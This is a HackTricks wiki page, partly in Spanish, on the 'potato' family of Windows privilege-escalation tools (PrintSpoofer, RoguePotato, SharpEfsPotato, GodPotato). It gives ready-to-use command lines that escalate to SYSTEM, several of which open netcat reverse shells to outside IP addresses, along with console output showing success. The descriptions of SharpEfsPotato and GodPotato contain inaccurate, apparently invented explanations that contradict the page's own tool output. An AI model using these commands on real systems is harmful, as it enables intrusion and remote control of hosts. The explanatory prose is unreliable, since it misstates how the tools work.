hacktricks/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md

RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• ¿Trabajas en una empresa de ciberseguridad? ¿Quieres ver tu empresa anunciada en HackTricks? ¿O quieres tener acceso a la última versión de PEASS o descargar HackTricks en PDF? ¡Consulta los PLANES DE SUSCRIPCIÓN!
• Descubre The PEASS Family, nuestra colección exclusiva de NFTs
• Obtén el swag oficial de PEASS y HackTricks
• Únete al 💬 grupo de Discord o al grupo de telegram o sígueme en Twitter 🐦@carlospolopm.
• Comparte tus trucos de hacking enviando PRs al repositorio de hacktricks y al repositorio de hacktricks-cloud.

{% hint style="warning" %} JuicyPotato no funciona en Windows Server 2019 y Windows 10 build 1809 en adelante. Sin embargo, se pueden utilizar PrintSpoofer, RoguePotato, SharpEfsPotato, GodPotato para aprovechar los mismos privilegios y obtener acceso de nivel NT AUTHORITY\SYSTEM. Esta publicación de blog profundiza en la herramienta PrintSpoofer, que se puede utilizar para abusar de los privilegios de suplantación en hosts de Windows 10 y Server 2019 donde JuicyPotato ya no funciona. {% endhint %}

Demo Rápida

PrintSpoofer

c:\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd"

--------------------------------------------------------------------------------

[+] Found privilege: SeImpersonatePrivilege

[+] Named pipe listening...

[+] CreateProcessAsUser() OK

NULL

RoguePotato

{% code overflow="wrap" %}

c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -l 9999
# In some old versions you need to use the "-f" param
c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -f 9999

{% code %}

SharpEfsPotato

SharpEfsPotato is a tool that exploits the EFS (Encrypting File System) service in Windows to achieve local privilege escalation. It takes advantage of the EFS service's interaction with the Windows Security Account Manager (SAM) to execute arbitrary code with SYSTEM privileges.

Usage

To use SharpEfsPotato, follow these steps:

1. Download the SharpEfsPotato binary from the GitHub repository.
2. Transfer the binary to the target Windows machine.
3. Execute the following command to run SharpEfsPotato:

SharpEfsPotato.exe

How it Works

SharpEfsPotato works by creating a rogue EFS certificate and registering it with the EFS service. When the EFS service interacts with the SAM, it triggers the execution of a custom DLL payload. This payload is responsible for escalating the current user's privileges to SYSTEM.

Limitations

SharpEfsPotato has the following limitations:

• It requires administrative privileges to run.
• It only works on Windows versions prior to Windows 10 1809 (build 17763).

Mitigation

To mitigate the risk of SharpEfsPotato and similar attacks, consider the following measures:

• Keep your Windows systems up to date with the latest security patches.
• Implement strong access controls and permissions on sensitive files and directories.
• Regularly monitor and review the usage of EFS certificates on your systems.

{% endcode %}

SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log"
SharpEfsPotato by @bugch3ck
Local privilege escalation from SeImpersonatePrivilege using EfsRpc.

Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.

[+] Triggering name pipe access on evil PIPE \\localhost/pipe/c56e1f1f-f91c-4435-85df-6e158f68acd2/\c56e1f1f-f91c-4435-85df-6e158f68acd2\c56e1f1f-f91c-4435-85df-6e158f68acd2
df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:
[x]RpcBindingSetAuthInfo failed with status 0x6d3
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!

C:\temp>type C:\temp\w.log
nt authority\system

GodPotato

GodPotato is a tool that combines the power of RoguePotato and PrintSpoofer to achieve local privilege escalation on Windows systems. It takes advantage of the Windows Print Spooler service and the impersonation capabilities of the Distributed Component Object Model (DCOM) to execute arbitrary code with SYSTEM privileges.

To use GodPotato, you need to have a low-privileged user account on the target system. The first step is to generate a malicious DLL payload using RoguePotato. This payload will be used to exploit the Print Spooler service. Once the payload is generated, you can transfer it to the target system.

Next, you need to execute the payload using PrintSpoofer. PrintSpoofer is a tool that allows you to impersonate the SYSTEM account and inject your payload into the Print Spooler service. This will trigger the execution of your code with SYSTEM privileges.

By combining the capabilities of RoguePotato and PrintSpoofer, GodPotato provides a powerful method for escalating privileges on Windows systems. It is important to note that this technique relies on the presence of certain vulnerabilities in the Windows operating system, so it may not work on all systems.

To protect against attacks like GodPotato, it is recommended to keep your Windows systems up to date with the latest security patches and to follow best practices for securing your environment.

GodPotato -cmd "cmd /c whoami"
GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• ¿Trabajas en una empresa de ciberseguridad? ¿Quieres ver tu empresa anunciada en HackTricks? ¿O quieres tener acceso a la última versión de PEASS o descargar HackTricks en PDF? ¡Consulta los PLANES DE SUSCRIPCIÓN!
• Descubre La Familia PEASS, nuestra colección exclusiva de NFTs
• Obtén el merchandising oficial de PEASS y HackTricks
• Únete al 💬 grupo de Discord o al grupo de Telegram o sígueme en Twitter 🐦@carlospolopm.
• Comparte tus trucos de hacking enviando PRs al repositorio de hacktricks y al repositorio de hacktricks-cloud.